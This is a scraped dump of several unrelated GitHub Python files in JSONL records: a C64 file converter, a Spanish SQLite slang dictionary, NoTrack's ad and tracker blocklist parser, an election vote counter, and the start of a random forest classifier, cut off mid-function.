len(students_ids))\n","repo_name":"manimanis/capstone","sub_path":"app/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38272021707","text":"#!/usr/bin/python3\n\nimport sys\nimport array\n\ndef usage():\n print(\"Usage: %s <64c file>\")\n exit(1)\n\nif len(sys.argv) != 2:\n usage()\n\nprgName = sys.argv[1]\nif prgName[-4:] in [\".64c\", \".64C\"]:\n binName1 = prgName[:-4] + \"-1.bin\"\n binName2 = prgName[:-4] + \"-2.bin\"\nelse:\n usage()\n\nprgFile = open(prgName, \"rb\")\n\n#prgFile.seek(0x2)\nscreen = array.array('B')\nscreen.fromfile(prgFile, 1024)\n\nbinFile = open(binName1, \"wb\")\nbinFile.write(screen)\nbinFile.close()\n\nscreen = array.array('B')\nscreen.fromfile(prgFile, 1024)\n\nbinFile = open(binName2, \"wb\")\nbinFile.write(screen)\nbinFile.close()\n\nprgFile.close()\n\n","repo_name":"leuat/TRSE","sub_path":"Publish/tutorials/C64/Olimp/Tools/64c2bin.py","file_name":"64c2bin.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":217,"dataset":"github-code","pt":"37"} +{"seq_id":"22520309665","text":"# Dylan Perez\nimport sqlite3\n\ncon = sqlite3.connect(\"slang.db\")\ncur = con.cursor()\n\n# Crea la tabla Slang si no existe\ncur.execute('''CREATE TABLE IF NOT EXISTS slang\n (palabra text UNIQUE, definicion text)''')\n\n# comprueba si la palabra existe\n\n\ndef checkWordExist(palabra):\n c = cur.execute(\"\"\"SELECT EXISTS (SELECT 1 \n FROM slang \n WHERE palabra=?\n LIMIT 1)\"\"\", (palabra, )).fetchone()[0]\n return c\n\n\nwhile True:\n # menu\n print(\"\\n Ingrese el numero que corresponde a la opcion que desea \\n\")\n\n menuOpt = int(input(\" 1 Agregar nueva palabra \\n 2 Editar palabra existente \\n 3 Eliminar palabra existente \\n 4 Ver listado de palabras \\n 5 Buscar significado de palabra \\n 6 Salir \\n\"))\n\n if(menuOpt == 1):\n # obtenemos la palabra y definicion\n palabra = input(\"\\n Ingrese la palabra a agregar \\n\")\n definicion = input(\n \"\\n por ultimo ingrese la definicion de la palabra \\n\")\n\n c = checkWordExist(palabra)\n if c == False:\n # guardamos los datos en una variable params y lo usamos ejecutando el comando sqlite para insertar valores\n params = (palabra, definicion)\n cur.execute(\"INSERT INTO slang VALUES (?, ?)\", params)\n\n # guardamos los cambios\n con.commit()\n\n else:\n print(\"\\n La palabra ya existe. \\n\")\n\n elif(menuOpt == 2):\n palabra = input(\"\\n Ingrese la palabra que desea modificar \\n\")\n\n palabraNueva = input(\"\\n Ingrese el nuevo valor de esta palabra \\n\")\n\n definicion = input(\"\\n Ingrese la nueva definicion de la palabra \\n\")\n\n params = (palabraNueva, definicion, palabra)\n c = checkWordExist(palabra)\n\n if c:\n # si existe remplazamos esa palabra por los nuevos valores\n cur.execute(\"\"\"\n UPDATE slang\n SET palabra = ?,\n definicion= ?\n WHERE palabra = ?;\n \"\"\", params)\n con.commit()\n\n else:\n print(\"No pudimos encontrar la palabra vuelva a intentarlo\")\n\n elif(menuOpt == 3):\n palabra = input(\"\\n Ingrese la palabra que desea eliminar \\n\")\n c = checkWordExist(palabra)\n if c:\n cur.execute(\"\"\"\n DELETE FROM slang\n WHERE palabra = ?\n \"\"\", (palabra, ))\n con.commit()\n\n else:\n print(\"No pudimos encontrar la palabra vuelva a intentarlo\")\n\n elif(menuOpt == 4):\n data = cur.execute(\"\"\"SELECT * FROM slang\"\"\")\n i = 1\n for palabra in data:\n print(f\"{i}. {palabra[0]}\")\n i += 1\n elif(menuOpt == 5):\n\n palabra = input(\n \"\\n Ingrese la palabra que desea ver su significado \\n\")\n c = checkWordExist(palabra)\n if c:\n data = cur.execute(\n \"\"\"SELECT * FROM slang WHERE palabra = ?\"\"\", (palabra, ))\n for palabra in data:\n print(f\"\\nEl significado es: \\n {palabra[1]}\")\n\n else:\n print(\"No pudimos encontrar la palabra vuelva a intentarlo\")\n\n elif(menuOpt == 6):\n break\n\n else:\n print(\"\\n Ingrese una opcion valida \\n\")\ncon.close()\n","repo_name":"Legozuhira/TALLER_SLANGP","sub_path":"slang_pan.py","file_name":"slang_pan.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16648155270","text":"#!/usr/bin/env python3\n#Title : NoTrack\n#Description : This script will download latest block lists from various sources, then parse them into Dnsmasq\n#Author : QuidsUp\n#Date : 2015-01-14\n#Version : 20.12\n#Usage : sudo python notrack.py\n\n#Standard imports\nimport os\nimport shutil\nimport sys\nimport time\n\n#Local imports\nimport errorlogger\nimport folders\nfrom blocklists import *\nfrom config import NoTrackConfig\nfrom host import Host\nfrom ntrkshared import *\nfrom ntrkmariadb import DBWrapper\nfrom ntrkregex import *\nfrom ntrkservices import Services\nfrom statusconsts import *\n\n#Create logger\nlogger = errorlogger.logging.getLogger(__name__)\n\n#######################################\n# Constants\n#######################################\nMAX_AGE = 172800 #2 days in seconds\n\nclass BlockParser:\n def __init__(self, dns_blockip):\n self.bl_custom = ''\n self.__dedupcount = 0 #Per list deduplication count\n self.__domaincount = 0 #Per list of added domains\n self.__totaldedupcount = 0\n self.__dnsserver_blacklist = '' #String for DNS Server Blacklist file\n self.__dnsserver_whitelist = '' #String for DNS Server Whitelist file\n\n self.__blocklist = list() #List of tupples for the blocklist\n self.__blockdomainset = set() #Domains in blocklist\n self.__blocktldset = set() #TLDs blocked\n self.__whiteset = set() #Domains in whitelist\n\n self.__services = Services() #Declare service class\n self.__dbwrapper = DBWrapper() #Declare MariaDB Wrapper\n\n #Fill in users blacklist and tld list locations\n blocklistconf['bl_blacklist'][1] = folders.blacklist\n blocklistconf['bl_tld'][1] = folders.tldist\n\n #Fill in __dnsserver_blacklist and __dnsserver_whitelist based on host IP\n self.__get_hostdetails(dns_blockip)\n\n\n def __add_blacklist(self, domain):\n \"\"\"\n Formatted string for a blacklist line\n \"\"\"\n return self.__dnsserver_blacklist % domain\n\n\n def __add_whitelist(self, domain):\n \"\"\"\n Formatted string for a whitelist line\n \"\"\"\n return self.__dnsserver_whitelist % domain\n\n\n def __get_hostdetails(self, dns_blockip):\n \"\"\"\n Get Host Name and IP address for __dnsserver_blacklist and __dnsserver_whitelist\n \"\"\"\n host = Host(dns_blockip) #Declare host class\n logger.info(f'Hostname: {host.name}, IP Address: {host.ip}')\n\n #Setup the template strings for writing out to black/white list files\n [self.__dnsserver_blacklist, self.__dnsserver_whitelist] = self.__services.get_dnstemplatestr(host.name, host.ip)\n\n\n def __extract_list(self, sourcezip, destination):\n \"\"\"\n Unzip a file to destination\n\n Parameters:\n sourcezip (str): Zip file\n destination (str): Output destination\n \"\"\"\n from zipfile import ZipFile\n\n with ZipFile(sourcezip) as zipobj:\n for compressedfile in zipobj.namelist():\n if compressedfile.endswith('.txt'):\n zipobj.extract(compressedfile, f'{folders.tempdir}/')\n logger.debug(f'Extracting {compressedfile}')\n move_file(f'{folders.tempdir}/{compressedfile}', destination)\n\n\n def __add_domain(self, subdomain, comment, source):\n \"\"\"\n Process supplied domain and add it to self.__blocklist\n 1. Extract domain.co.uk from say subdomain.domain.co.uk\n 2. Check if domain.co.uk is in self.__blockdomainset\n 3. If subdomain is actually a domain then record domain in self.__blockdomainset\n 4. Reverse subdomain\n 5. Append to self.__blocklist as [reverse, subdomain, comment, source]\n\n Parameters:\n subdomain (str): Subdomain or domain\n comment (str): A comment\n source (str): Block list name\n \"\"\"\n reverse = '' #Reversed domain\n\n matches = Regex_Domain.search(subdomain)\n\n if matches == None: #Could be a TLD instead?\n self.__add_tld(subdomain, comment, source)\n return\n\n if matches.group(0) in self.__blockdomainset: #Blocked by domain or whitelisted?\n #logger.debug(f'{subdomain} is already in blockdomainset as {matches.group(0)}')\n self.__dedupcount += 1\n self.__totaldedupcount += 1\n return\n\n if matches.group(2) in self.__blocktldset: #Blocked by TLD?\n #logger.debug(f'{subdomain} is blocked by TLD {matches.group(2)}')\n return\n\n if matches.group(0) == subdomain: #Add domain.co.uk to blockdomainset\n #logger.debug(f'Adding domain {subdomain}')\n self.__blockdomainset.add(subdomain)\n\n #Reverse the domain for later sorting and deduplication\n #An Extra dot is required to match other subdomains and avoid similar spellings\n reverse = subdomain[::-1] + '.'\n self.__blocklist.append(tuple([reverse, subdomain, comment, source]))\n self.__domaincount += 1\n\n\n def __add_tld(self, tld, comment, source):\n \"\"\"\n Process TLD and add it to __blocktldset\n\n Parameters:\n tld (str): A possible Top Level Domain\n comment (str): A comment\n source (str): Block list name\n \"\"\"\n matches = Regex_TLD.search(tld)\n\n if matches == None: #Don't know what it is\n return\n\n self.__blocktldset.add(tld)\n reverse = tld[::-1] + '.'\n self.__blocklist.append(tuple([reverse, tld, comment, source]))\n self.__domaincount += 1\n\n def __match_defanged(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Defanged List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_Defanged.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n #Add group 1 - Domain and replace defanged [.] with .\n self.__add_domain(matches.group(1).replace('[.]', '.'), '', listname)\n return True\n\n return False #Nothing found, return False\n\n\n def __match_easyline(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Easy List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_EasyLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), '', listname) #Add group 1 - Domain\n return True\n\n return False #Nothing found, return False\n\n\n def __match_plainline(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Plain List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_PlainLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), matches.group(2), listname)\n return True\n\n return False #Nothing found, return False\n\n\n def __match_unixline(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Unix List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_UnixLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), matches.group(2), listname)\n return True\n\n return False #Nothing found, return False\n\n\n def __process_customlist(self, lines, linecount, listname):\n \"\"\"\n We don't know what type of list this is, so try regex match against different types\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Try different regex matches\n\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n if self.__match_plainline(line, 'custom'): #Try against Plain line\n continue\n if self.__match_easyline(line, 'custom'): #Try against Easy List\n continue\n if self.__match_unixline(line, 'custom'): #Try against Unix List\n continue\n self.__match_defanged(line, 'custom') #Finally try against Defanged\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_csv(self, filelines, linecount, listname):\n \"\"\"\n List of domains in a CSV file, assuming cell 1 = domain, cell 2 = comment\n 1. Reset dedup and domain counters\n 2. Read list of filelines\n 3. Check regex match against Regex_CSV\n 4. Add domain and comment\n\n Parameters:\n filelines (list): List of lines from file to being processed\n listname (str): Blocklist name\n \"\"\"\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in filelines: #Read through list\n matches = Regex_CSV.match(line)\n\n if matches is not None: #Has a match been found?\n #Add Group 1 - Domain, Group 2 - Comment\n self.__add_domain(matches.group(1), matches.group(2), listname)\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_easylist(self, lines, linecount, listname):\n \"\"\"\n List of domains in Adblock+ filter format [https://adblockplus.org/filter-cheatsheet]\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Check regex match against Regex_EasyLine\n 4. Add domain\n\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n matches = Regex_EasyLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), '', listname) #Add group 1 - Domain\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_plainlist(self, lines, linecount, listname):\n \"\"\"\n List of domains with optional # separated comments\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Split each line by hash delimiter\n 4. Add domain\n\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n splitline = list()\n\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n splitline = line.split('#', 1) #Split by hash delimiter\n\n if splitline[0] == '\\n' or splitline[0] == '': #Ignore Comment line or Blank\n continue\n\n if len(splitline) > 1: #Line has a comment\n self.__add_domain(splitline[0][:-1], splitline[1][:-1], listname)\n\n else: #No comment, leave it blank\n self.__add_domain(splitline[0][:-1], '', listname)\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_unixlist(self, lines, linecount, listname):\n \"\"\"\n List of domains starting with either 0.0.0.0 or 127.0.0.1 domain.com\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Check regex match against Regex_UnixLine\n 4. Add domain\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n matches = Regex_UnixLine.search(line) #Search for first match\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), '', listname) #Add group 1 - Domain\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_whitelist(self):\n \"\"\"\n Load items from whitelist file into self.__blockdomainset array\n (A domain being in the self.__blocklist will prevent it from being added later)\n \"\"\"\n whitedict_len = 0\n sqldata = list()\n splitline = list()\n\n print('Processing whitelist')\n\n filelines = load_file(folders.whitelist) #Load White list\n\n if filelines == None:\n logger.info('Nothing in whitelist')\n delete(f'{folders.dnslists}whitelist.list')\n return\n\n for line in filelines: #Process each line\n splitline = line.split('#', 1)\n if splitline[0] == '\\n' or splitline[0] == '': #Ignore Comment line or Blank\n continue\n\n self.__blockdomainset.add(splitline[0][:-1])\n self.__whiteset.add(splitline[0][:-1])\n\n if len(splitline) > 1: #Line has a comment\n sqldata.append(tuple(['whitelist', splitline[0][:-1], True, splitline[1][:-1]]))\n else: #No comment, leave it blank\n sqldata.append(tuple(['whitelist', splitline[0][:-1], True, '']))\n\n #Count number of domains white listed\n whitedict_len = len(self.__whiteset)\n\n if whitedict_len > 0:\n logger.info(f'Number of domains in whitelist: {whitedict_len}')\n self.__dbwrapper.blocklist_insertdata(sqldata)\n else:\n logger.info('Nothing in whitelist')\n delete(f'{folders.dnslists}whitelist.list')\n\n\n def __tld_whitelist(self):\n \"\"\"\n Any domains in whitelist impacted by the TLD blocks?\n This should be done after TLD and users block lists are processed\n \"\"\"\n\n filelines = list()\n\n #Check for white listed domains that are blocked by tld\n for line in self.__whiteset:\n matches = Regex_Domain.search(line) #Only need the tld\n if matches.group(2) in self.__blocktldset: #Is tld in self.__blocktldset?\n filelines.append(self.__add_whitelist(line))\n\n if len(filelines) > 0: #Any domains in whitelist?\n logger.debug(f'{len(filelines)} domains added to whitelist in order avoid block from TLD')\n save_file(filelines, f'{folders.dnslists}whitelist.list')\n\n else:\n logger.debug('No domains require whitelisting')\n delete(f'{folders.dnslists}whitelist.list')\n\n self.__whiteset.clear() #whiteset is no longer required\n\n\n def __check_file_age(self, filename):\n \"\"\"\n Does file exist?\n Check last modified time is within MAX_AGE (2 days)\n\n Parameters:\n filename (str): File\n Returns:\n True update list\n False list within MAX_AGE\n \"\"\"\n if not os.path.isfile(filename):\n logger.warning(f'{filename} is missing')\n return True\n\n if time.time() > (os.path.getmtime(filename) + MAX_AGE):\n logger.info(f'{filename} older than 2 days')\n return True\n\n logger.info(f'{filename} in date, skip downloading new copy')\n return False\n\n\n def __download_list(self, url, listname, destination):\n \"\"\"\n Download file\n Request file is unzipped (if necessary)\n\n Parameters:\n url (str): URL\n listname (str): List name\n destination (str): File destination\n Returns:\n True success\n False failed download\n \"\"\"\n extension = ''\n outputfile = ''\n\n #Prepare for writing downloaded file to temp folder\n if url.endswith('zip'): #Check file extension\n extension = 'zip'\n outputfile = f'{folders.tempdir}/{listname}.zip'\n\n else: #Other - Assume txt for output\n extension = 'txt'\n outputfile = destination\n\n if not download_file(url, outputfile):\n return False\n\n if extension == 'zip': #Extract zip file?\n self.__extract_list(outputfile, destination)\n\n return True\n\n\n def __action_lists(self):\n \"\"\"\n Go through config and process each enabled list\n 1. Skip disabled lists\n 2. Check if list is downloaded or locally stored\n 3. For downloaded lists\n 3a. Check file age\n 3b. Download new copy if out of date\n 4. Read file into filelines list\n 5. Process list based on type\n \"\"\"\n blname = '' #Block list name (shortened)\n blenabled = False\n blurl = '' #Block list URL\n bltype = '' #Block list type\n blfilename = '' #Block list file name\n linecount = 0\n\n for bl in blocklistconf.items():\n blname = bl[0]\n blenabled = bl[1][0]\n blurl = bl[1][1]\n bltype = bl[1][2]\n\n if not blenabled: #Skip disabled blocklist\n continue\n\n print(f'Processing {blname}')\n\n #Is this a downloadable file or locally stored?\n if blurl.startswith('http') or blurl.startswith('ftp'):\n blfilename = f'{folders.tempdir}/{blname}.txt' #Download to temp folder\n if self.__check_file_age(blfilename): #Does file need freshening?\n self.__download_list(blurl, blname, blfilename)\n\n else: #Local file\n blfilename = blurl; #URL is actually the filename\n\n filelines = load_file(blfilename) #Read temp file\n linecount = len(filelines)\n\n if not filelines: #Anything read from file?\n logger.warning(f'Data missing unable to process {blname}')\n continue\n\n if bltype == TYPE_PLAIN:\n self.__process_plainlist(filelines, linecount, blname)\n elif bltype == TYPE_EASYLIST:\n self.__process_easylist(filelines, linecount, blname)\n elif bltype == TYPE_UNIXLIST:\n self.__process_unixlist(filelines, linecount, blname)\n elif bltype == TYPE_CSV:\n self.__process_csv(filelines, linecount, blname)\n\n print(f'Finished processing {blname}')\n\n\n def __action_customlists(self):\n \"\"\"\n Go through config and process each enabled list\n 1. Skip disabled lists\n 2. Check if list is downloaded or locally stored\n 3. For downloaded lists\n 3a. Check file age\n 3b. Download new copy if out of date\n 4. Read file into filelines list\n 5. Process list based on type\n \"\"\"\n blname = ''\n blurl = '' #Block list URL\n blfilename = '' #Block list file name\n i = 0 #Loop position (for naming)\n customurllist = list()\n\n print('Processing Custom Blocklists')\n if self.bl_custom == '':\n logger.debug('No custom blocklists files or URLs set')\n return\n\n customurllist = self.bl_custom.split(',') #Explode comma seperated vals\n\n for blurl in customurllist:\n i += 1\n blname = f'bl_custom{i}' #Make up a name\n logger.info(f'{blname} - {blurl}')\n\n #Is this a downloadable file or locally stored?\n if blurl.startswith('http') or blurl.startswith('ftp'):\n #Download to temp folder with loop position in file name\n blfilename = f'{folders.tempdir}/{blname}.txt'\n if self.__check_file_age(blfilename): #Does file need freshening?\n self.__download_list(blurl, blname, blfilename)\n\n else: #Local file\n blfilename = blurl;\n\n filelines = load_file(blfilename) #Read temp file\n if not filelines: #Anything read from file?\n logger.warning(f'File missing, unable to process {blname}')\n continue\n\n self.__process_customlist(filelines, blname)\n logger.info(f'Finished processing {blname}')\n\n\n def __dedup_lists(self):\n \"\"\"\n Final sort and then save list to file\n 1. Sort the blocklist by the reversed domain (blocklist[x][0])\n 2. Check if each item matches the beginning of the previous item\n (i.e. a subdomain of a blocked domain)\n 3. Remove matched items from the list\n 4. Add unique items into sqldata and blacklist\n 5. Save blacklist to file\n 6. Insert SQL data\n \"\"\"\n prev = '\\0' #Previous has to be something (e.g. a null byte)\n dns_blacklist = list()\n sqldata = list()\n\n self.__dedupcount = 0\n print('Sorting and Deduplicating blocklist')\n\n self.__blocklist.sort(key=lambda x: x[0]) #Sort list on col0 \"reversed\"\n for item in self.__blocklist:\n if item[0].startswith(prev):\n #print('Removing:', item)\n #self.__blocklist.remove(item)\n self.__dedupcount += 1\n else:\n #self.__blocklist.append(tuple([reverse, subdomain, comment, source]))\n dns_blacklist.append(self.__add_blacklist(item[1]))\n sqldata.append(tuple([item[3], item[1], True, item[2]]))\n prev = item[0]\n\n print(f'Further deduplicated {self.__dedupcount} domains')\n print(f'Final number of domains in blocklist: {len(dns_blacklist)}')\n\n save_file(dns_blacklist, f'{folders.dnslists}notrack.list')\n self.__dbwrapper.blocklist_insertdata(sqldata)\n\n\n def create_blocklist(self):\n \"\"\"\n Create blocklist and restart DNS Server\n \"\"\"\n self.__dbwrapper.blocklist_createtable() #Create SQL Tables\n self.__dbwrapper.blockliststats_createtable()\n self.__dbwrapper.blocklist_cleartable() #Clear SQL Tables\n\n self.__process_whitelist() #Need whitelist first\n self.__action_lists() #Action default lists\n self.__action_customlists() #Action users custom lists\n self.__tld_whitelist()\n\n print('Finished processing all block lists')\n print(f'Total number of domains added: {len(self.__blocklist)}')\n print(f'Total number of domains deduplicated: {self.__totaldedupcount}')\n\n self.__dedup_lists() #Dedup then insert domains\n self.__services.restart_dnsserver()\n\n\n def disable_blocking(self):\n \"\"\"\n Move blocklist to temp folder\n \"\"\"\n if move_file(folders.main_blocklist, folders.temp_blocklist):\n logger.info('Moving blocklist to temp folder')\n else:\n logger.warning('Blocklist missing')\n\n self.__services.restart_dnsserver()\n\n\n def enable_blockling(self):\n \"\"\"\n Move temp blocklist back to DNS config folder\n \"\"\"\n if move_file(folders.temp_blocklist, folders.main_blocklist):\n logger.info('Moving temp blocklist back')\n self.__services.restart_dnsserver()\n\n else:\n logger.warning('Temp blocklist missing, I will recreate it')\n self.create_blocklist()\n\n\n def load_blconfig(self):\n \"\"\"\n \"\"\"\n blconfig = '' #Blocklist Config File\n filelines = list()\n\n blconfig = f'{folders.webconfigdir}/bl.php'\n\n if not os.path.isfile(blconfig):\n logger.warning('Blocklist config is missing, using default values')\n return\n\n filelines = load_file(blconfig)\n\n for line in filelines:\n matches = Regex_BlockListStatus.match(line)\n if matches is not None:\n self.set_blocklist_status(matches[1], matches[2])\n continue\n\n matches = Regex_BlockListCustom.match(line)\n if matches is not None:\n self.bl_custom = matches[1]\n continue\n\n\n def set_blocklist_status(self, blname, status):\n \"\"\"\n Set Blocklist status from config\n \"\"\"\n newstatus = False\n\n if status == 'true':\n newstatus = True\n\n if blname in blocklistconf:\n blocklistconf[blname][0] = newstatus;\n return True;\n\n return False;\n\n\ndef main():\n print('NoTrack Block List Parser')\n config = NoTrackConfig()\n check_root()\n\n blockparser = BlockParser(config.dns_blockip)\n blockparser.load_blconfig()\n blockparser.create_blocklist()\n print('Finished creating block list for NoTrack :-)')\n print()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sq4/notrack","sub_path":"src/blockparser.py","file_name":"blockparser.py","file_ext":"py","file_size_in_byte":28401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"9472521088","text":"import os\nimport csv\n\n\nvotes = []\ncandidate_list = []\ncandidates = []\n\ncsvpath = os.path.join('', \"election_data.csv\")\n\nwith open(csvpath) as csvfile:\n reader=csv.reader(csvfile)\n\n for row in reader:\n votes.append(row[0])\n candidates.append(row[2])\n\n #remove header in votes list\n votes.pop(0)\n vote_count = len(votes)\n\n print(\"ELECTION RESULTS\")\n print(\" \")\n print(\"A Total of \" + str(vote_count) + \" votes were cast.\")\n print(\" \") \n\n #remove header from Candidates list\n candidates.pop(0)\n\n #find unique values in \"candidates\" list\n candidate_set = set(candidates)\n candidate_list = list(candidate_set)\n\n print(\"The list of possible candidates are:\" + str(candidate_list))\n print(\"-------------------------------\")\n\n #for name in candidate_list:\n # print(name)\n\n #create empty lists for each candidate\n khan = []\n otooley = []\n li = []\n correy = []\n #add each candidate to their own list each time they appear\n for each in candidates:\n if each == \"Khan\":\n khan.append(each)\n elif each == \"O'Tooley\":\n otooley.append(each)\n elif each == \"Li\":\n li.append(each)\n elif each == \"Correy\":\n correy.append(each)\n\n #find percentage of votes each candidate received\n correy_percent = len(correy)/vote_count\n otooley_percent = len(otooley)/vote_count\n li_percent = len(li)/vote_count\n khan_percent = len(khan)/vote_count\n \n\n print(\"Correy: \" + str(len(correy)) + \" {:.2%}\".format(correy_percent))\n print(\"O'Tooley: \" + str(len(otooley)) + \" {:.2%}\".format(otooley_percent))\n print(\"Li: \" + str(len(li)) + \" {:.2%}\".format(li_percent))\n print(\"Khan: \" + str(len(khan)) + \" {:.2%}\".format(khan_percent))\n\n print(\"WINNER: Khan\")\n\nwith open('analysis/election_analysis.txt', 'w') as f:\n f.write(\"ELECTION RESULTS\" \"\\n\")\n f.write(\" \" \"\\n\")\n f.write(\"A Total of \" + str(vote_count) + \" votes were cast.\" \"\\n\")\n f.write(\" \" \"\\n\")\n f.write(\"The list of possible candidates are:\" + str(candidate_list) )\n f.write( \"\\n\" \"-------------------------------\" \"\\n\")\n f.write(\"Correy: \" + str(len(correy)) + \" {:.2%}\".format(correy_percent))\n f.write(\"\\n\" \"O'Tooley: \" + str(len(otooley)) + \" {:.2%}\".format(otooley_percent))\n f.write(\"\\n\" \"Li: \" + str(len(li)) + \" {:.2%}\".format(li_percent))\n f.write(\"\\n\" \"Khan: \" + str(len(khan)) + \" {:.2%}\".format(khan_percent))\n f.write( '\\n' \"WINNER: Khan\")\n ","repo_name":"ChrisJtron/python_challenge_homework","sub_path":"pypoll/mainpypoll3.py","file_name":"mainpypoll3.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70761289069","text":"# implementation of the Random Forest algorithm\n# to keep things more readable, \"fc\" is used to indicate \"first class\", and \"sc\" to indicate \"second class\"\n\n# internal imports\nimport Classifier\nimport DecisionTree\nimport debug\n\n# external imports\nimport math\nimport random\n\n\n# the maximum number of random decision trees to train\n_max_trees = 500\n\n# the maximum number of random features to sample\n_max_sample = 200\n\n# the minimum number of records required to build another Tree node; otherwise force a Leaf node\n_leaf_threshold = 5\n\n# the maximum number of times a tree can recurse into new branches when growing (1000 is Python's default internal max)\n_rec_limit = 100\n\n\n# public interface function to training a classifier; expects 2D list with binary features as input\ndef train(parsed_training_data):\n\n # HELPER FUNCTIONS for train function\n # -----------------------------------\n\n # calculate the information entropy in a set of data with two classes\n def _calculate_entropy(fc_count, sc_count):\n if fc_count == 0 or sc_count == 0:\n entropy = 0\n else:\n fc_prob = fc_count / (fc_count + sc_count)\n sc_prob = 1 - fc_prob\n\n entropy = -fc_prob * math.log2(fc_prob) - sc_prob * math.log2(sc_prob)\n\n return entropy\n\n # function to take a random sample of features from provided training data and find the feature to split on\n # that provides the greatest information gain\n def _find_best_sampled_feature(training_data_cut):\n\n # pick a number of random samples up to square root length of classifier features, but no more than _max_sample\n features_length = len(classifier_features)\n sqrt_features = math.ceil(math.sqrt(features_length))\n sample_feature_size = sqrt_features if sqrt_features < _max_sample else _max_sample\n sample_feature_list = []\n for j in range(0, sample_feature_size):\n feature_index = random.randint(0, (features_length - 1))\n sample_feature_list.append(feature_index)\n\n # for each sampled feature, split the training data on that feature, count the votes of the resulting class\n # distribution, and build a list of the sampled features and their associated vote information\n vote_count_list = []\n for feature_index in sample_feature_list:\n # add 2 to feature index to skip RECORD and CLASS columns\n skip_index = feature_index + 2\n\n # count the resulting first class and second class votes on each side of the split on this feature\n fc_has_vote = 0\n sc_has_vote = 0\n fc_has_not_vote = 0\n sc_has_not_vote = 0\n for find_row in training_data_cut:\n if find_row[skip_index]:\n if find_row[1] == first_class:\n fc_has_vote += 1\n else:\n sc_has_vote += 1\n else:\n if find_row[1] == first_class:\n fc_has_not_vote += 1\n else:\n sc_has_not_vote += 1\n\n # add the vote information resulting from the split to the vote count list\n index_and_votes = (feature_index, (fc_has_vote, sc_has_vote), (fc_has_not_vote, sc_has_not_vote))\n vote_count_list.append(index_and_votes)\n\n # calculate the class vote entropy for the total training data cut; this can be found by adding up class votes\n # in the first (or any) index of the vote_count_list\n fc_parent_vote = vote_count_list[0][1][0] + vote_count_list[0][2][0]\n sc_parent_vote = vote_count_list[0][1][1] + vote_count_list[0][2][1]\n parent_entropy = _calculate_entropy(fc_parent_vote, sc_parent_vote)\n\n # initialize variable to contain information of best information gain split that can be found; use first feature\n # in vote count list as starting data; second element is information gain\n best_information_feature = (vote_count_list[0], 0)\n\n # calculate entropy resulting from each feature split in the vote count list to find information gain\n parent_votes = fc_parent_vote + sc_parent_vote\n for feature_vote_count in vote_count_list:\n # gather has (left) and has not (right) votes\n fc_has_vote = feature_vote_count[1][0]\n sc_has_vote = feature_vote_count[1][1]\n fc_has_not_vote = feature_vote_count[2][0]\n sc_has_not_vote = feature_vote_count[2][1]\n\n # calculate entropy of left (has) and right (has not) 